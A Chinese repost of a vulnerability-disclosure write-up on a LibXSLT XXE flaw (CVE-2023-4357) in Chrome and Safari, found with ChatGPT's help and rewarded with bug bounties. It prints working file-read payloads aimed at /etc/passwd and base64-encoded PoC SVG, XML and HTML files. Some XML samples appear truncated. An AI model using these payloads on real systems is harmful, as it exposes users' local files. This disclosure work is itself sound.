问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
使用 ChatGPT获取Web浏览器的XXE(CVE-2023-4357),收获赏金$28000
渗透测试
使用chatgpt生成xxe测试示例获得chrome和苹果浏览器赏金
翻译:<https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/> 一年前,我想知道一个禁用 JavaScript 的恶意页面能做什么。 我知道 SVG 基于 XML,而 XML 本身可能很复杂并且允许文件访问。对于所有可能的XML和SVG语法,是否正确地实现了同源策略(SOP)?通过 `file://` 协议的访问是否得到正确处理? 由于我懒得阅读文档,所以我开始使用 ChatGPT 生成示例。 XSL === 我决定测试的技术是 XSL。它代表可扩展样式表语言。这是一种基于 XML 的专门语言,可以在 XML 内部或外部使用,用于修改或检索数据。 在 Chrome 中,支持 XSL,使用的库是 LibXSLT。可以通过使用 `system-property('xsl:vendor')` 函数来验证,如下例所示。 system-properties.xml ```xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet href="system-properties.xsl" type="text/xsl"?> <root/> ``` system-properties.xsl ```xml <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <p> Version: <xsl:value-of select="system-property('xsl:version')" /> <br /> Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br /> Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> </p> </xsl:template> </xsl:stylesheet> ``` 这是 system-properties.xml 文件的输出,上传到本地网络服务器并在 Chrome 中打开: ![](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-79b1fc6e77ab60e92ee73b1ce2952a098939bb2a.png) LibXSLT 库于 1999 年 9 月 23 日首次发布,历史悠久且广泛使用。它是 Chrome、Safari、PHP、PostgreSQL、Oracle 数据库、Python 以及众多其他应用程序中的默认组件。 ChatGPT 的第一个有趣的 XSL 输出是一个具有功能的代码,允许你检索当前文档的位置。虽然这不是一个漏洞,但在某些情况下可能会有用。 get-location.xml ```xml <?xml-stylesheet href="get-location.xsl" type="text/xsl"?> ]> <test> <getLocation test="ent"/> </test> ``` get-location.xsl ```xml <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" > <xsl:output method="html"/> <xsl:template match="getLocation"> <input type="text" value="{unparsed-entity-uri(@test)}" /> </xsl:template> </xsl:stylesheet> ``` 将此代码上传到您的网络服务器后,你应该看到以下内容: ![](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-e6452d026a8c5835b121c7fc24c2d1f619993f63.png) 所有的神奇的事情都发生在 unparsed-entity-uri() 函数中。这个函数返回“ent”实体的完整路径,该路径是使用相对路径“?”构建的。 XSL 和远程内容 ========= 几乎所有基于 XML 的语言都有用于加载或显示远程文件的功能,类似于 HTML 中的 <iframe> 标签的功能。 我多次询问 ChatGPT 关于 XSL 的内容加载功能。以下示例是 ChatGPT 建议我使用的,代码完全来自它。 **XML 外部实体** 由于 XSL 是基于 XML 的,因此应首先使用 XML 外部实体。 ```xml <?xml version="1.0"?> ]> <test>&xxe;</test> ``` **XInclude** XInclude 是一个 XML 附加组件,描述在 2006 年 11 月 15 日的 W3C 推荐中。 ```xml <?xml version="1.0"?> <test xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include href="file:///etc/passwd"/> </test> ``` **XLS 的<xsl:import>和<xsl:include>标签** 根据 ChatGPT,这些标签可以用来将文件加载为 XSL 样式表。 ```xml <?xml version="1.0" ?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:include href="file:///etc/passwd"/> <xsl:import href="file:///etc/passwd"/> </xsl:stylesheet> ``` **XLS 的 document()函数** XLS 的 document() 函数可用于将文件加载为 XML 文档。 ```xml <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:copy-of select="document('file:///etc/passwd')"/> </xsl:template> </xsl:stylesheet> ``` XXE === 使用编辑过的 ChatGPT 输出,我制作了一个 XSL 文件,将 document() 函数与参数文件中的 XML 外部实体结合起来,利用数据协议。接下来,我将 XSL 文件的内容插入到 XML 文件中,同样使用数据协议。 当我通过手机上的 HTTP URL 打开我的 XML 文件时,我震惊地看到了我的 iOS /etc/hosts 文件!后来,我的朋友 Yaroslav Babin(又名@yarbabin)在 Android 上确认了同样的结果! | ![](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-4bdcaedcea9360a5a70fe12c6682a2c55280883c.png) | ![](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-01b3e2f433533413284561e83e6d744e6c8d401d.png) | |---|---| | iOS + Safari | 安卓 + Chrome | 接下来,我开始测试离线 HTML 到 PDF 工具,结果发现文件读取也可以在那里工作,尽管它们有内置的限制。 这不可能不是一个漏洞! 这是我的智能电视的照片,文件读取也正常: ![](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-2b9e7a3d98de07dd65a7439c478464ee40bf6c83.png) 我编制了一个表格,总结了我的所有测试: | 测试场景 | 可访问的文件 | |---|---| | Android + Chrome | /etc/hosts | | iOS + Safari | /etc/group, /etc/hosts, /etc/passwd | | Windows + Chrome | – | | Ubuntu + Chrome | – | | PlayStation 4 + Chrome | – | | Samsung TV + Chrome | /etc/group, /etc/hosts, /etc/passwd | 造成这种差异的根本原因可能是沙箱之间的差异。在 Windows 或 Linux 上使用 --no-sandbox 属性运行 Chrome 允许以当前用户身份读取任意文件。 其他测试 ==== 我测试了一些使用 LibXSLT 并且没有沙箱的应用程序。 | 应用 | 结果 | |---|---| | PHP | Applications that allow control over XSLTProcessor::importStylesheet data can be affected. | | XMLSEC | The document() function did not allow http(s):// and data: URLs. | | Oracle | The document() function did not allow http(s):// and data: URLs. | | PostgreSQL | The document() function did not allow http(s):// and data: URLs. | 默认 PHP 配置禁用外部实体 XML 和 XSL 文档的解析。但是,这不会影响 document() 函数加载的 XML 文档,并且 PHP 允许使用 LibXSLT 读取任意文件。 ![](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-ff0ae63845e1638f4cbcbfbeb521458ea4592e7c.png) 根据我的测试,调用 `libxml_set_external_entity_loader(function ($a) {});` 足以防止攻击。 POC === 您将在本节末尾的 ZIP 存档中找到所有 POC。请注意,这些不是零日 POC;稍后还将提供有关向供应商报告的详细信息和赏金信息。 首先,我创建了一个包含多个 <iframe> 元素的简单 HTML 页面,以测试所有可能的文件读取功能以及链接它们的所有可能方法: ![](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-632fa7136e0e58e6a249208b5e078e806136a426.png) 在旧版本的 Chrome 中打开 xxe\_all\_tests/test.html 页面的结果 在 Chrome、Safari 或类似 Electron 的应用程序中打开此页面。它可能会读取具有默认沙箱设置的系统文件;如果没有沙箱,它可以以当前用户的权限读取任意文件。 正如您现在所看到的,Chrome 中只有一个调用链会导致 XXE,我们很幸运地找到了它。这是我的链示意图,以便更好地理解: ![](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-f3e4387e35bc216d891f798fadecb904fabeb0a3.png) 接下来,我创建了mini版的 XML、SVG 和 HTML POC,您可以直接从文章中复制它们。 poc.svg ```xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgbWV0aG9kPSJ4bWwiLz4KPHhzbDp0ZW1wbGF0ZSBtYXRjaD0iLyI+CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGZvcmVpZ25PYmplY3Qgd2lkdGg9IjMwMCIgaGVpZ2h0PSI2MDAiPgo8ZGl2IHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4KTGlicmFyeTogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlbmRvcicpIiAvPjx4c2w6dmFsdWUtb2Ygc2VsZWN0PSJzeXN0ZW0tcHJvcGVydHkoJ3hzbDp2ZXJzaW9uJykiIC8+PGJyIC8+IApMb2NhdGlvbjogPHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InVucGFyc2VkLWVudGl0eS11cmkoLyovQGxvY2F0aW9uKSIgLz4gIDxici8+ClhTTCBkb2N1bWVudCgpIFhYRTogCjx4c2w6Y29weS1vZiAgc2VsZWN0PSJkb2N1bWVudCgnZGF0YTosJTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIyVVRGLTglMjIlM0YlM0UlMEElM0MlMjFET0NUWVBFJTIweHhlJTIwJTVCJTIwJTNDJTIxRU5USVRZJTIweHhlJTIwU1lTVEVNJTIwJTIyZmlsZTovLy9ldGMvcGFzc3dkJTIyJTNFJTIwJTVEJTNFJTBBJTNDeHhlJTNFJTBBJTI2eHhlJTNCJTBBJTNDJTJGeHhlJTNFJykiLz4KPC9kaXY+CjwvZm9yZWlnbk9iamVjdD4KPC9zdmc+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> ]> <svg location="ent" /> ``` poc.xml ```xml <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xsl" href="data:text/xml;base64,PHhzbDpzdHlsZXNoZWV0IHZlcnNpb249IjEuMCIgeG1sbnM6eHNsPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0iIHhtbG5zOnVzZXI9Imh0dHA6Ly9teWNvbXBhbnkuY29tL215bmFtZXNwYWNlIj4KPHhzbDpvdXRwdXQgdHlwZT0iaHRtbCIvPgo8eHNsOnRlbXBsYXRlIG1hdGNoPSJ0ZXN0MSI+CjxodG1sPgpMaWJyYXJ5OiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0ic3lzdGVtLXByb3BlcnR5KCd4c2w6dmVuZG9yJykiIC8+PHhzbDp2YWx1ZS1vZiBzZWxlY3Q9InN5c3RlbS1wcm9wZXJ0eSgneHNsOnZlcnNpb24nKSIgLz48YnIgLz4gCkxvY2F0aW9uOiA8eHNsOnZhbHVlLW9mIHNlbGVjdD0idW5wYXJzZWQtZW50aXR5LXVyaShAbG9jYXRpb24pIiAvPiAgPGJyLz4KWFNMIGRvY3VtZW50KCkgWFhFOiAKPHhzbDpjb3B5LW9mICBzZWxlY3Q9ImRvY3VtZW50KCdkYXRhOiwlM0MlM0Z4bWwlMjB2ZXJzaW9uJTNEJTIyMS4wJTIyJTIwZW5jb2RpbmclM0QlMjJVVEYtOCUyMiUzRiUzRSUwQSUzQyUyMURPQ1RZUEUlMjB4eGUlMjAlNUIlMjAlM0MlMjFFTlRJVFklMjB4eGUlMjBTWVNURU0lMjAlMjJmaWxlOi8vL2V0Yy9wYXNzd2QlMjIlM0UlMjAlNUQlM0UlMEElM0N4eGUlM0UlMEElMjZ4eGUlM0IlMEElM0MlMkZ4eGUlM0UnKSIvPgo8L2h0bWw+CjwveHNsOnRlbXBsYXRlPgo8L3hzbDpzdHlsZXNoZWV0Pg=="?> ]> <test1 location="ent"/> ``` poc.html ```html <html> <head> <title>LibXSLT document() XXE tests</title> </head> <body> SVG<br/> <iframe src=""></iframe><br/> SVG WIN<br/> <iframe src=""></iframe><br/> XML<br/> <iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrUEhoemJEcDJZV3gxWlMxdlppQnpaV3hsWTNROUluTjVjM1JsYlMxd2NtOXdaWEowZVNnbmVITnNPblpsY25OcGIyNG5LU0lnTHo0OFluSWdMejRnQ2t4dlkyRjBhVzl1T2lBOGVITnNPblpoYkhWbExXOW1JSE5sYkdWamREMGlkVzV3WVhKelpXUXRaVzUwYVhSNUxYVnlhU2hBYkc5allYUnBiMjRwSWlBdlBpQWdQR0p5THo0S1dGTk1JR1J2WTNWdFpXNTBLQ2tnV0ZoRk9pQUtQSGh6YkRwamIzQjVMVzltSUNCelpXeGxZM1E5SW1SdlkzVnRaVzUwS0Nka1lYUmhPaXdsTTBNbE0wWjRiV3dsTWpCMlpYSnphVzl1SlRORUpUSXlNUzR3SlRJeUpUSXdaVzVqYjJScGJtY2xNMFFsTWpKVlZFWXRPQ1V5TWlVelJpVXpSU1V3UVNVelF5VXlNVVJQUTFSWlVFVWxNakI0ZUdVbE1qQWxOVUlsTWpBbE0wTWxNakZGVGxSSlZGa2xNakI0ZUdVbE1qQlRXVk5VUlUwbE1qQWxNakptYVd4bE9pOHZMMlYwWXk5d1lYTnpkMlFsTWpJbE0wVWxNakFsTlVRbE0wVWxNRUVsTTBONGVHVWxNMFVsTUVFbE1qWjRlR1VsTTBJbE1FRWxNME1sTWtaNGVHVWxNMFVuS1NJdlBnbzhMMmgwYld3K0Nqd3ZlSE5zT25SbGJYQnNZWFJsUGdvOEwzaHpiRHB6ZEhsc1pYTm9aV1YwUGc9PSI/Pgo8IURPQ1RZUEUgdGVzdCBbICAKICAgIDwhRU5USVRZIGVudCBTWVNURU0gIj8iIE5EQVRBIGFhYT4gICAKXT4KPHRlc3QxIGxvY2F0aW9uPSJlbnQiLz4="></iframe><br/> XML WIN<br/> <iframe src="data:text/xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4KPD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3hzbCIgaHJlZj0iZGF0YTp0ZXh0L3htbDtiYXNlNjQsUEhoemJEcHpkSGxzWlhOb1pXVjBJSFpsY25OcGIyNDlJakV1TUNJZ2VHMXNibk02ZUhOc1BTSm9kSFJ3T2k4dmQzZDNMbmN6TG05eVp5OHhPVGs1TDFoVFRDOVVjbUZ1YzJadmNtMGlJSGh0Ykc1ek9uVnpaWEk5SW1oMGRIQTZMeTl0ZVdOdmJYQmhibmt1WTI5dEwyMTVibUZ0WlhOd1lXTmxJajRLUEhoemJEcHZkWFJ3ZFhRZ2RIbHdaVDBpYUhSdGJDSXZQZ284ZUhOc09uUmxiWEJzWVhSbElHMWhkR05vUFNKMFpYTjBNU0krQ2p4b2RHMXNQZ3BNYVdKeVlYSjVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWMzbHpkR1Z0TFhCeWIzQmxjblI1S0NkNGMydzZkbVZ1Wkc5eUp5a2lJQzgrSmlONE1qQTdQSGh6YkRwMllXeDFaUzF2WmlCelpXeGxZM1E5SW5ONWMzUmxiUzF3Y205d1pYSjBlU2duZUhOc09uWmxjbk5wYjI0bktTSWdMejQ4WW5JZ0x6NGdDa3h2WTJGMGFXOXVPaUE4ZUhOc09uWmhiSFZsTFc5bUlITmxiR1ZqZEQwaWRXNXdZWEp6WldRdFpXNTBhWFI1TFhWeWFTaEFiRzlqWVhScGIyNHBJaUF2UGlBZ1BHSnlMejRLV0ZOTUlHUnZZM1Z0Ym1WMEtDa2dXRmhGT2lBS1BIaHpiRHBqYjNCNUxXOW1JQ0J6Wld4bFkzUTlJbVJ2WTNWdFpXNTBLQ2RrWVhSaE9pd2xNME1sTTBaNGJXd2xNakIyWlhKemFXOXVKVE5FSlRJeU1TNHdKVEl5SlRJd1pXNWpiMlJwYm1jbE0wUWxNakpWVkVZdE9DVXlNaVV6UmlVelJTVXdRU1V6UXlVeU1VUlBRMVJaVUVVbE1qQjRlR1VsTWpBbE5VSWxNakFsTTBNbE1qRkZUbFJKVkZrbE1qQjRlR1VsTWpCVFdWTlVSVTBsTWpBbE1qSm1hV3hsT2k4dkwyTTZMM2RwYm1SdmQzTXZjM2x6ZEdWdExtbHVhU1V5TWlVelJTVXlNQ1UxUkNVelJTVXdRU1V6UTNoNFpTVXpSU1V3UVNVeU5uaDRaU1V6UWlVd1FTVXpReVV5Um5oNFpTVXpSU2NwSWk4K0Nqd3ZhSFJ0YkQ0S1BDOTRjMnc2ZEdWdGNHeGhkR1UrQ2p3dmVITnNPbk4wZVd4bGMyaGxaWFErIj8+CjwhRE9DVFlQRSB0ZXN0IFsgIAogICAgPCFFTlRJVFkgZW50IFNZU1RFTSAiPyIgTkRBVEEgYWFhPiAgIApdPgo8dGVzdDEgbG9jYXRpb249ImVudCIvPg=="></iframe><br/> </body> ``` 用于测试的 ZIP 存档:[libxslt.zip](https://swarm.ptsecurity.com/wp-content/uploads/2024/05/d34e0a53-libxslt.zip) 赏金 == 所有发现均已报告给供应商。 ![](https://shs3.b.qianxin.com/attack_forum/2024/05/attach-48991357055aeec88820fefd39c3bcb2db8d9133.png) **苹果浏览器** 苹果实施了沙盒补丁。分配的 CVE:CVE-2023-40415。奖励:25,000 美元。
发表于 2024-06-12 10:00:02
阅读 ( 28022 )
分类:
漏洞分析
1 推荐
收藏
0 条评论
请先
登录
后评论
csallin
11 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!